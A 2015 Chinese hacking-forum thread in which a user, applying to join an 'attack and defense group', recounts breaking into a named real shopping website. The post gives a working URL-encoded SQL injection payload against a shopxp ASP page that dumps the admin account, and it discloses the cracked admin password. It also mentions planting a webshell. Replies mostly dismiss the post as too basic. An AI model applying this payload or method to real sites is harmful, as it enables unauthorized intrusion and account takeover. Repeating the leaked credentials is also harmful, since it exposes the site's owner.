查看: 15630|回复: 10

申请加入攻防小组

[复制链接]
发表于 2015-11-28 20:53:51 | 显示全部楼层 |阅读模式
本帖最后由 385895133 于 2015-11-28 21:01 编辑

今天想加入攻防小组 试试

不说废话直接入正题

找了个站点

目标站点http://591whc.com/

先打开看看 QQ截图20151128203257.png

看那价格我就下尿了

好了转回了

额用站长看了看ip 额 是福建的 QQ截图20151128203956.png

不管他 随便点了个产品进去 发现 asp的网站

先试试 注入  and 1=1  额.....跳的主页了

先试下后台吧 看看admin 对不对

运气不错 QQ截图20151128204413.png

咦 发现居然是shopxplogin.asp的后台

看来今天运气真好既然是shopxplogin.asp

都不用试其他方法了

直接爆数据库吧

在网站http://591whc.com/后面加入TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin回车

QQ截图20151128204844.png 出来了 admin 是账号  后面的faada90e895ea17b不用我说大家也知道是md5密码了吧

去解密吧

得到密码luoxinruias

登陆试试 QQ截图20151128205152.png ok 就这样成功了

asp的网站么直接挂小马就ok 了

不浪费大家时间了

教程到此结束

                                                                                       BY:啊睿



最后啰嗦一句 管理大大求通过 么么哒



回复

使用道具 举报

发表于 2015-11-28 21:03:47 | 显示全部楼层
好好起个ID多在论坛活跃一段时间吧!
回复 支持 反对

使用道具 举报

发表于 2015-11-28 21:05:06 | 显示全部楼层
不通过,一点亮点都没有,还有楼主的id和头像太过于非主流
回复 支持 反对

使用道具 举报

发表于 2015-11-28 21:06:29 | 显示全部楼层
怎么说呢,过程简单无亮点,只是进了后台,后续呢??
回复 支持 反对

使用道具 举报

发表于 2015-11-28 21:21:20 | 显示全部楼层
你能详细在详细吗?你让高手意会,但别人一看就觉得太过于简单、
回复 支持 反对

使用道具 举报

发表于 2015-11-29 00:35:30 | 显示全部楼层
"asp的站么直接挂小马就ok了" 真有这么简单?求普及你这个强大的0day----asp的站直接挂上小马,我想学习学习。
回复 支持 反对

使用道具 举报

发表于 2015-11-29 00:35:37 | 显示全部楼层
"asp的站么直接挂小马就ok了" 真有这么简单?求普及你这个强大的0day----asp的站直接挂上小马,我想学习学习。

评分

参与人数 1i币 -2 收起 理由
昊情· -2 恶意灌水

查看全部评分

回复 支持 反对

使用道具 举报

发表于 2015-11-29 08:31:46 | 显示全部楼层
多在论坛活跃活跃!
回复 支持 反对

使用道具 举报

发表于 2015-11-29 09:37:37 | 显示全部楼层
亮点在哪呢?
回复 支持 反对

使用道具 举报

发表于 2015-11-29 15:58:25 | 显示全部楼层
下面90回复
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-10 16:48 , Processed in 0.023001 second(s), 11 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部